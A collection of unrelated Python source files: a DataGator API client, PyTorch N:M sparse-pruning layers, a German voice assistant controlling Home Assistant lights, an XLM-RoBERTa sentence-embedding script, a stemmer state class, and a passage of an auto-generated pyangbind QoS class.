if not chunk:
continue
f.write(chunk)
self.__raw_body = f
self.__size = f.tell()
_log.debug(" - decoded size: {0}".format(len(self)))
except (AssertionError, IOError, ):
# re-raise as runtime error
raise RuntimeError("invalid response from backend service")
else:
# validate status code
if self.__expected_status is not None and \
self.status_code not in self.__expected_status:
# error responses always come with code and message
data = self.json()
msg = "unexpected response from backend service"
if data.get("kind") == "datagator#Error":
msg = "{0} ({1}): {2}".format(
msg, data.get("code", "N/A"), data.get("message", ""))
# re-raise as runtime error
raise RuntimeError(msg)
pass
return self
def __exit__(self, ext_type, exc_value, traceback):
if isinstance(exc_value, Exception):
_log.error("failed response validation")
# discard temporary file
if self.__raw_body is not None:
self.__raw_body.close()
self.__raw_body = None
return False # re-raise exception
pass
class EntityType(type):
"""
Meta class for initializing class members of the Entity class
"""
def __new__(cls, name, parent, prop):
# initialize cache manager shared by all entities
try:
mod, sep, cm_cls = environ.DATAGATOR_CACHE_BACKEND.rpartition(".")
CacheManagerBackend = getattr(importlib.import_module(mod), cm_cls)
assert(issubclass(CacheManagerBackend, CacheManager))
except (ImportError, AssertionError):
raise AssertionError("invalid cache backend '{0}'".format(
environ.DATAGATOR_CACHE_BACKEND))
else:
prop['store'] = CacheManagerBackend()
# initialize backend service shared by all entities
try:
service = DataGatorService()
except:
raise RuntimeError("failed to initialize backend service")
else:
prop['service'] = service
# initialize schema validator shared by all entities
try:
# load schema from local file if exists (fast but may be staled)
filename = os.path.join(os.path.dirname(__file__), "schema.json")
schema = None
if os.access(filename, os.F_OK | os.R_OK):
with open(filename, "r") as f:
schema = json.load(f)
f.close()
# load schema from service backend (slow but always up-to-date)
if schema is None:
schema = prop['service'].schema
except:
raise RuntimeError("failed to initialize schema validator")
else:
JsonSchemaValidator = jsonschema.validators.create(
meta_schema=jsonschema.Draft4Validator.META_SCHEMA,
validators=jsonschema.Draft4Validator.VALIDATORS,
version=b"draft4",
default_types=dict(itertools.chain(
jsonschema.Draft4Validator.DEFAULT_TYPES.items(),
[('array', (list, tuple)), ]))
)
prop['schema'] = JsonSchemaValidator(schema)
return type(to_native(name), parent, prop)
pass
class Entity(with_metaclass(EntityType, object)):
"""
Abstract base class of all client-side entities
"""
class Ref(OrderedDict):
def __hash__(self):
return json.dumps(self).__hash__()
pass
@classmethod
def cleanup(cls):
# decref triggers garbage collection of the cache manager backend
setattr(cls, "store", None)
pass
__slots__ = ['__kind', ]
def __init__(self, kind):
super(Entity, self).__init__()
self.__kind = normalized(kind)
pass
@property
def kind(self):
return self.__kind
@property
@abc.abstractmethod
def uri(self):
return None
@property
@abc.abstractmethod
def ref(self):
return None
# `cache` is defined with old-school getter / deleter methods, because a
# subclass may need to access `super(SubClass, self)._cache_getter()` and
# `._cache_deleter()` to extend / override the default caching behaviour.
def _cache_getter(self):
data = Entity.store.get(self.uri, None)
if data is None:
with validated(Entity.service.get(self.uri, stream=True)) as r:
# valid response should bear a matching entity kind
kind = normalized(r.headers.get("X-DataGator-Entity", None))
assert(kind == self.kind), \
"unexpected entity kind '{0}'".format(kind)
# cache data for reuse (iff. advised by the backend)
if r.headers.get("Cache-Control", "private") != "no-cache":
# cache backend typically only support byte-string values,
# so passing `r.body` (file-like object) instead of `data`
# (dictionary) can save an extra round of JSON-encoding.
Entity.store.put(self.uri, r.body)
# this should come last since calling `r.json()` will close the
# temporary file under `r.body` implicitly (observed in py27).
data = r.json()
return data
def _cache_deleter(self):
Entity.store.delete(self.uri)
pass
cache = property(_cache_getter, None, _cache_deleter)
def _to_json(self):
return self.cache
def __repr__(self):
return "<{0} '{1}' at 0x{2:x}>".format(
self.__class__.__name__, self.uri, id(self))
pass
atexit.register(Entity.cleanup)
|
import torch
from torch import autograd, nn
import torch.nn.functional as F
from itertools import repeat
import collections.abc as container_abcs  # torch._six.container_abcs was an alias for this and has been removed in newer PyTorch
import time
from prune.pruning_method_transposable_block_l1 import PruningMethodTransposableBlockL1
def _ntuple(n):
def parse(x):
if isinstance(x, container_abcs.Iterable):
return x
return tuple(repeat(x, n))
return parse
_single = _ntuple(1)
_pair = _ntuple(2)
_triple = _ntuple(3)
_quadruple = _ntuple(4)
def update_mask_approx2(data, mask, topk=4,BS=8):
mask.fill_(0)
Co = data.shape[0]
#topk=BS//2
_,idx_sort = data.sort(1,descending=True); #block x 64
for k in range(BS**2):
if k<topk:
mask[range(Co),idx_sort[range(Co),k]] = 1
else:
ii,jj = idx_sort//BS,idx_sort%BS
row_cond= mask.view(-1,BS,BS).sum(1)[range(Co),jj[:,k]]<topk
col_cond = mask.view(-1,BS,BS).sum(2)[range(Co),ii[:,k]]<topk
if (~row_cond).all() and (~col_cond).all():
break
idx_sort[row_cond.mul(col_cond)][:,k]
mask[row_cond.mul(col_cond),idx_sort[row_cond.mul(col_cond)][:,k]]=1
return mask
def update_mask(data, mask, BS=8, top_k_eval=32, max_steps=1):
Co = data.shape[0]
for k in range(max_steps):
val_max, ind_max = data.mul(1 - mask).topk(top_k_eval, 1, sorted=False)
iii, jjj = ind_max // BS, ind_max % BS
copy_data = data.clone()
copy_data[mask == 0] = 1e9
mpc = copy_data.reshape(-1, BS, BS).min(1)[1]
mpr = copy_data.reshape(-1, BS, BS).min(2)[1]
out_r = mpr.gather(1, iii)
out_c = mpc.gather(1, jjj)
ind_out = torch.cat([iii * BS + out_r, out_c * BS + jjj]).reshape(2, Co, top_k_eval)
ind_in_new = out_c * BS + out_r
ind_in = torch.cat([ind_max, ind_in_new]).reshape(2, Co, top_k_eval)
val_in = data.mul(1 - mask).gather(1, ind_in[1])
val_min1 = data.gather(1, ind_out[0])
val_min2 = data.gather(1, ind_out[1])
mask_change_val, mask_change_ind = (val_max + val_in - val_min1 - val_min2).max(1)
ind_in = ind_in[:, range(Co), mask_change_ind].t()
ind_out = ind_out[:, range(Co), mask_change_ind].t()
block_masks_in = torch.zeros_like(data).reshape(Co, -1).scatter_(1, ind_in, torch.ones_like(ind_in).float())
block_masks_out = torch.zeros_like(data).reshape(Co, -1).scatter_(1, ind_out, torch.ones_like(ind_out).float())
new_mask = (mask + block_masks_in - block_masks_out).clamp(0, 1)
mask_update = mask_change_val > 0
mask[mask_update] = new_mask[mask_update]
if sum(mask_update) == 0:
break
return mask
class SparseTranspose(autograd.Function):
    """Prune the unimportant edges in the forward pass but pass the gradient to the dense weight using STE in the backward pass."""
@staticmethod
def forward(ctx, weight, N, M, counter, freq, absorb_mean):
weight.mask = weight.mask.to(weight)
output = weight.clone()
if counter%freq==0:
weight_temp = weight.detach().abs().reshape(-1, M*M)
weight_mask = weight.mask.detach().reshape(-1, M*M)
#weight_mask = update_mask(weight_temp,weight_mask,BS=M)
weight_mask = update_mask_approx2(weight_temp,weight_mask,BS=M)
if absorb_mean:
output = output.reshape(-1, M*M).clone()
output+=output.mul(1-weight_mask).mean(1,keepdim=True)
output=output.reshape(weight.shape)
weight.mask=weight_mask.reshape(weight.shape)
return output*weight.mask, weight.mask
@staticmethod
def backward(ctx, grad_output, _):
return grad_output, None, None, None, None, None
class Sparse(autograd.Function):
    """Prune the unimportant edges in the forward pass but pass the gradient to the dense weight using STE in the backward pass."""
@staticmethod
def forward(ctx, weight, N, M):
output = weight.clone()
length = weight.numel()
group = int(length/M)
weight_temp = weight.detach().abs().reshape(group, M)
index = torch.argsort(weight_temp, dim=1)[:, :int(M-N)]
w_b = torch.ones(weight_temp.shape, device=weight_temp.device)
w_b = w_b.scatter_(dim=1, index=index, value=0).reshape(weight.shape)
return output*w_b, w_b
@staticmethod
def backward(ctx, grad_output, _):
return grad_output, None, None
class SparseTransposeV2(autograd.Function):
    """Prune the unimportant edges in the forward pass but pass the gradient to the dense weight using STE in the backward pass."""
@staticmethod
def forward(ctx, weight, N, M, counter):
weight.mask = weight.mask.to(weight)
output = weight.reshape(-1, M*M).clone()
weight_mask = weight.mask.reshape(-1, M*M)
output+=torch.mean(output.mul(1-weight_mask),dim=1,keepdim=True)
weight.mask=weight_mask.reshape(weight.shape)
output=output.reshape(weight.shape)
return output*weight.mask, weight.mask
@staticmethod
def backward(ctx, grad_output, _):
return grad_output, None, None, None
class SparseConvTranspose(nn.Conv2d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', N=2, M=4, **kwargs):
self.N = N
self.M = M
self.counter = 0
self.freq = 1
self.absorb_mean = False
super(SparseConvTranspose, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode, **kwargs)
def get_sparse_weights(self):
return SparseTranspose.apply(self.weight, self.N, self.M, self.counter, self.freq, self.absorb_mean)
def forward(self, x):
if self.training:
self.counter+=1
self.freq = 40 #min(self.freq+self.counter//100,100)
w, mask = self.get_sparse_weights()
setattr(self.weight, "mask", mask)
else:
w = self.weight * self.weight.mask
x = F.conv2d(
x, w, self.bias, self.stride, self.padding, self.dilation, self.groups
)
return x
class SparseConvTransposeV2(nn.Conv2d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', N=2, M=4, **kwargs):
self.N = N
self.M = M
self.counter = 0
self.freq = 1
self.rerun_ip = 0.01
self.ipClass = PruningMethodTransposableBlockL1(block_size=self.M, topk=self.N)
super(SparseConvTransposeV2, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode, **kwargs)
def get_sparse_weights(self):
with torch.no_grad():
weight_temp = self.weight.detach().abs().reshape(-1, self.M*self.M)
weight_mask = self.weight.mask.detach().reshape(-1, self.M*self.M)
num_samples_ip= int(self.rerun_ip*weight_temp.shape[0])
idx=torch.randperm(weight_temp.shape[0])[:num_samples_ip]
sample_weight = weight_temp[idx]
mask_new = self.ipClass.compute_mask(sample_weight,torch.ones_like(sample_weight))
weight_mask = weight_mask.to(self.weight.device)
weight_mask[idx]=mask_new.to(self.weight.device)
return SparseTransposeV2.apply(self.weight, self.N, self.M, self.counter)
def forward(self, x):
# self.counter+=1
# self.freq = min(self.freq+self.counter//100,100)
w, mask = self.get_sparse_weights()
setattr(self.weight, "mask", mask)
x = F.conv2d(
x, w, self.bias, self.stride, self.padding, self.dilation, self.groups
)
return x
class SparseConv(nn.Conv2d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros', N=2, M=4, **kwargs):
self.N = N
self.M = M
super(SparseConv, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, groups, bias, padding_mode, **kwargs)
def get_sparse_weights(self):
return Sparse.apply(self.weight, self.N, self.M)
def forward(self, x):
w, mask = self.get_sparse_weights()
setattr(self.weight, "mask", mask)
x = F.conv2d(
x, w, self.bias, self.stride, self.padding, self.dilation, self.groups
)
return x
class SparseLinear(nn.Linear):
    def __init__(self, in_channels, out_channels, bias=True, N=2, M=4, **kwargs):
        self.N = N
        self.M = M
        super(SparseLinear, self).__init__(in_channels, out_channels, bias)
class SparseLinearTranspose(nn.Linear):
def __init__(self, in_channels, out_channels, bias=True, N=2, M=4, **kwargs):
self.N = N
self.M = M
self.counter = 0
self.freq = 10
super(SparseLinearTranspose, self).__init__(in_channels, out_channels, bias,)
def get_sparse_weights(self):
return SparseTranspose.apply(self.weight, self.N, self.M, self.counter, self.freq, False)
def forward(self, x):
if self.training:
self.counter += 1
self.freq = 40 # min(self.freq+self.counter//100,100)
w, mask = self.get_sparse_weights()
setattr(self.weight, "mask", mask)
else:
w = self.weight * self.weight.mask
x = F.linear(
x, w, self.bias
)
return x
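# A minimal, hedged usage sketch (not part of the original module, and assuming
# the module's own dependencies are importable): run a 2:4 sparse convolution on
# a random input; after the first forward pass roughly half of the weights
# should be masked out.
if __name__ == "__main__":
    conv = SparseConv(4, 8, kernel_size=3, padding=1, bias=False, N=2, M=4)
    x = torch.randn(1, 4, 16, 16)
    y = conv(x)
    kept = conv.weight.mask.mean().item()  # fraction of weights kept, ~N/M
    print(y.shape, "fraction of weights kept: %.2f" % kept)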
|
#!/usr/bin/env python3
import queue
from typing import Callable
import sounddevice as sd
import vosk
import sys
import json
import requests
import random
import configparser
from assistant import Assistant
from command import Command, CommandError
API_URL = None
TOKEN = None
q = queue.Queue()
def callback(indata, frames, time, status):
"""This is called (from a separate thread) for each audio block."""
if status:
print(status, file=sys.stderr)
q.put(bytes(indata))
def api_request(path: str, data: str) -> Callable:
def func():
res = requests.post(f"{API_URL}{path}",
data=str(data), headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code < 200 or res.status_code >= 300:
raise CommandError
return func
def handle_input(text: str, engine):
print(text)
text = text.strip().lower()
if "mach clemens lampe an" in text:
res = requests.post(f"{API_URL}/api/services/light/turn_on",
data='{"entity_id": "light.clemens_lampe"}', headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code >= 200 and res.status_code <= 300:
engine.say("Okeh.")
engine.runAndWait()
if "mach clemens lampe aus" in text:
res = requests.post(f"{API_URL}/api/services/light/turn_off",
data='{"entity_id": "light.clemens_lampe"}', headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code >= 200 and res.status_code <= 300:
engine.say("Okeh.")
engine.runAndWait()
if "mach ronja lampe an" in text:
res = requests.post(f"{API_URL}/api/services/light/turn_on",
data='{"entity_id": "light.ronjas_lampe"}', headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code >= 200 and res.status_code <= 300:
engine.say("Okeh.")
engine.runAndWait()
if "mach ronja lampe aus" in text:
res = requests.post(f"{API_URL}/api/services/light/turn_off",
data='{"entity_id": "light.ronjas_lampe"}', headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code >= 200 and res.status_code <= 300:
engine.say("Okeh.")
engine.runAndWait()
if "mach das licht an" in text:
res = requests.post(f"{API_URL}/api/services/light/turn_on",
data='{"entity_id": ["light.clemens_lampe", "light.ronjas_lampe"]}', headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code >= 200 and res.status_code <= 300:
engine.say("Okeh.")
engine.runAndWait()
if "mach das licht aus" in text:
res = requests.post(f"{API_URL}/api/services/light/turn_off",
data='{"entity_id": ["light.clemens_lampe", "light.ronjas_lampe"]}', headers={"Authorization": f"Bearer {TOKEN}"})
if res.status_code >= 200 and res.status_code <= 300:
engine.say("Okeh.")
engine.runAndWait()
if "singe mir ein lied" in text:
engine.say("la la la.")
engine.runAndWait()
if "wirf einen würfel" in text:
die = random.randint(1, 6)
engine.say(f"Das Ergebnis ist {die}")
engine.runAndWait()
def roll_d6():
die = random.randint(1, 6)
return f"Das Ergebnis ist {die}"
def phrases():
"""Returns recognized phrases until `KeyboardInterrupt` """
device_info = sd.query_devices(None, 'input')
print(device_info)
samplerate = int(device_info['default_samplerate'])
model = vosk.Model("model")
with sd.RawInputStream(samplerate=samplerate, blocksize=8000, dtype='int16',
channels=1, callback=callback):
rec = vosk.KaldiRecognizer(model, samplerate)
try:
while True:
data = q.get()
if rec.AcceptWaveform(data):
text = json.loads(rec.Result())["text"]
# handle_input(text, engine)
yield text
else:
res = rec.PartialResult()
print(f'Partial: {json.loads(res)["partial"]}')
except KeyboardInterrupt:
print("Done")
def main():
global API_URL
global TOKEN
config = configparser.ConfigParser()
config.read("config.ini")
API_URL = config["HomeAssistant"]["API_URL"]
TOKEN = config["HomeAssistant"]["TOKEN"]
assistant = Assistant()
assistant.add_command(Command("mach clemens lampe an", api_request(
"/api/services/light/turn_on", '{"entity_id": "light.clemens_lampe"}')))
assistant.add_command(Command("mach clemens lampe aus", api_request(
"/api/services/light/turn_off", '{"entity_id": "light.clemens_lampe"}')))
assistant.add_command(Command("wirf einen würfel", roll_d6))
assistant.add_command(Command("singe mir ein lied", lambda: "la la la"))
assistant.run(phrases())
if __name__ == "__main__":
main()
|
# Get sentence representations
"""
Sentences have to be in the BPE format, i.e. tokenized sentences on which you applied fastBPE.
Below you can see an example for English, French, Spanish, German, Arabic and Chinese sentences.
"""
########################################################
############ Testing on simple examples ################
#########################################################
from transformers import XLMRobertaModel
from transformers import XLMRobertaTokenizer
import torch
from keras.preprocessing.sequence import pad_sequences
import numpy as np
from tqdm import tqdm
import argparse
import gc
parser = argparse.ArgumentParser(description='Getting sentence embeddings with XLM. ')
parser.add_argument('--max_len', type=int, default=40,
help='Maximum number of tokens: sentences with fewer tokens are padded, and all tokens after the max_len index are removed')
parser.add_argument('--pooling_strat',type=str, default='cls',
help='Pooling strategy to use to get sentence embeddings for last hidden layer')
args = parser.parse_args()
MAX_LEN = args.max_len
POOL_STRAT = args.pooling_strat
if POOL_STRAT == 'mean':
print('Using mean pooling strategy...')
if POOL_STRAT == 'cls':
print('Using CLS pooling strategy...')
class XLM_R_model:
"""
from here: https://github.com/huggingface/pytorch-transformers/blob/a2d4950f5c909f7bb4ea7c06afa6cdecde7e8750/pytorch_transformers/modeling_xlm.py
We can see all the possible models existing for XLM.
We focus on MLM+TLM, which is the model with the best performance on cross-lingual tasks.
"""
XLM_PRETRAINED_MODEL_ARCHIVE_MAP = {
'xlm-mlm-en-2048': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-en-2048-pytorch_model.bin",
'xlm-mlm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-ende-1024-pytorch_model.bin",
'xlm-mlm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enfr-1024-pytorch_model.bin",
'xlm-mlm-enro-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-enro-1024-pytorch_model.bin",
'xlm-mlm-tlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-tlm-xnli15-1024-pytorch_model.bin",
'xlm-mlm-xnli15-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-xnli15-1024-pytorch_model.bin",
'xlm-clm-enfr-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-clm-enfr-1024-pytorch_model.bin",
'xlm-clm-ende-1024': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-clm-ende-1024-pytorch_model.bin",
'xlm-mlm-17-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-17-1280-pytorch_model.bin",
'xlm-mlm-100-1280': "https://s3.amazonaws.com/models.huggingface.co/bert/xlm-mlm-100-1280-pytorch_model.bin",
}
def __init__(self, model_name):
# @TODO: check again what `causal` refers to
# model = XLMModel.from_pretrained("xlm-mlm-enfr-1024", causal = False)
self.model_name = model_name
self.model = XLMRobertaModel.from_pretrained(model_name)
self.tokenizer = XLMRobertaTokenizer.from_pretrained(self.model_name, do_lower_case=True)
def encode(self, sentence: str, max_len: int):
########## For 15 languages ########
tokenizer = self.tokenizer
"""
from https://huggingface.co/transformers/_modules/transformers/tokenization_utils.html
truncation_strategy: string selected in the following options:
- 'longest_first' (default) Iteratively reduce the inputs sequence until the input is under max_length
starting from the longest one at each token (when there is a pair of input sequences)
- 'only_first': Only truncate the first sequence
- 'only_second': Only truncate the second sequence
- 'do_not_truncate': Does not truncate (raise an error if the input sequence is longer than max_length)
pad_to_max_length: if set to True, the returned sequences will be padded according to the model's padding side and
padding index, up to their max length. If no max length is specified, the padding is done up to the model's max length.
The tokenizer padding sides are handled by the class attribute `padding_side` which can be set to the following strings:
- 'left': pads on the left of the sequences
- 'right': pads on the right of the sequences
Defaults to False: no padding.
"""
# Actually the Padding is done with the ID = 1
# So all tokens with ids = 1 are just paddings
input_ids = torch.tensor(
tokenizer.encode(sentence, add_special_tokens=True, max_length=max_len, truncation_strategy="longest_first",
pad_to_max_length='right')).unsqueeze(0) # Batch size 1
# print("input ids")
# print(input_ids)
# outputs = self.model(input_ids)
# embed = outputs[0] # The last hidden-state is the first element of the output tuple
########### CREATE ATTENTION MASKS ###################
# This is just to apply attention on the part where there are actual tokens
# Tokens are all ids different from id = 1
ones = torch.ones((1, input_ids.shape[1]))
zeros = torch.zeros((1, input_ids.shape[1]))
attention_masks = torch.where(input_ids == 1, zeros, ones) # put zeros where paddings are, one otherwise
########## FORWARD TO GET EMBEDDINGS ##########
embeddings_tuple = self.model(input_ids=input_ids, attention_mask=attention_masks)
embeddings_ = embeddings_tuple[0]
# print(embeddings_)
# print(embeddings_.shape)
# print(embeddings_[:,0,:].shape)
if POOL_STRAT == 'cls':
embeddings_first_token_only = embeddings_[:, 0, :]
embeddings_arr = embeddings_first_token_only.cpu().detach().numpy()
# print(embeddings_arr.shape)
del embeddings_, embeddings_first_token_only, embeddings_tuple
elif POOL_STRAT == 'mean':
input_mask_expanded = attention_masks.unsqueeze(-1).expand(embeddings_.size()).float()
# print("Input masks")
# print(input_mask_expanded)
# print(input_mask_expanded.shape)
# print(embeddings_ * input_mask_expanded)
sum_embeddings = torch.sum(embeddings_ * input_mask_expanded, dim = 1)
sum_mask = input_mask_expanded.sum(1) # number of tokens in txt sequence
sum_mask = torch.clamp(sum_mask, min=1e-9)
embeddings_mean = sum_embeddings / sum_mask
embeddings_arr = embeddings_mean.cpu().detach().numpy()
# print(embeddings_arr.shape)
del embeddings_, embeddings_mean, embeddings_tuple
# free up ram
gc.collect()
return embeddings_arr
if __name__=='__main__':
# for length in newstest2012.tok.fr
# mean value = 26.6
# std value = 15.4
# max value = 145
# Load XLM model
XLM_model = XLM_R_model("xlm-roberta-large")
max_len = MAX_LEN
# Open file
lang_arr = ['cs', 'de', 'en', 'es', 'fr', 'ru']
# lang = "ru"
for lang in lang_arr:
# input_file_name = "../data/processed/wmt2012/newstest2012.tok.{}".format(lang)
input_file_name = "../dev/newstest2012.{}".format(lang)
arr_embed = []
with open(input_file_name, 'r') as file:
N_lines = 3003
with tqdm(total=N_lines) as pbar:
for line in file:
line = line.strip("\n")
# For each line get embedding
embed = XLM_model.encode(sentence = line, max_len = max_len)
arr_embed.append(embed)
pbar.update(1)
# Store embedding in an array
np_embed = np.array(arr_embed)
# save numpy array in memory
np.save(file = "../output/XLM_R/newstest2012.{}.embed".format(lang), arr = np_embed)
|
from ..suffixes import DerivationalSuffix
from ..transitions import Transition
from . import State
class DerivationalState(State):
def __init__(self, initialState, finalState, *suffixes):
super(DerivationalState, self).__init__(initialState, finalState, *suffixes)
def NextState(self, suffix):
if self.initialState:
return B
A = DerivationalState(True, False, *DerivationalSuffix.VALUES)
B = DerivationalState(False, True)
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class qos(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-common-def - based on the path /routing-system/interface/ve/qos. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__dscp_cos','__dscp_mutation','__dscp_traffic_class',)
_yang_name = 'qos'
_rest_name = 'qos'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__dscp_mutation = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-Mutation map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
self.__dscp_cos = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-CoS map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
self.__dscp_traffic_class = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-Traffic-Class map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'routing-system', u'interface', u've', u'qos']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'interface', u'Ve', u'qos']
def _get_dscp_cos(self):
"""
Getter method for dscp_cos, mapped from YANG variable /routing_system/interface/ve/qos/dscp_cos (map-name-type)
"""
return self.__dscp_cos
def _set_dscp_cos(self, v, load=False):
"""
Setter method for dscp_cos, mapped from YANG variable /routing_system/interface/ve/qos/dscp_cos (map-name-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_dscp_cos is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dscp_cos() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-CoS map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """dscp_cos must be of a type compatible with map-name-type""",
'defined-type': "brocade-qos-mls:map-name-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-CoS map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)""",
})
self.__dscp_cos = t
if hasattr(self, '_set'):
self._set()
def _unset_dscp_cos(self):
self.__dscp_cos = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-to-CoS map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
def _get_dscp_mutation(self):
"""
Getter method for dscp_mutation, mapped from YANG variable /routing_system/interface/ve/qos/dscp_mutation (map-name-type)
"""
return self.__dscp_mutation
def _set_dscp_mutation(self, v, load=False):
"""
Setter method for dscp_mutation, mapped from YANG variable /routing_system/interface/ve/qos/dscp_mutation (map-name-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_dscp_mutation is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dscp_mutation() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply DSCP-Mutation map', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='map-name-type', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """dscp_mutation must be of a type compatible with map-name-type""",
'defined-type': "brocade-qos-mls:map-name-type",
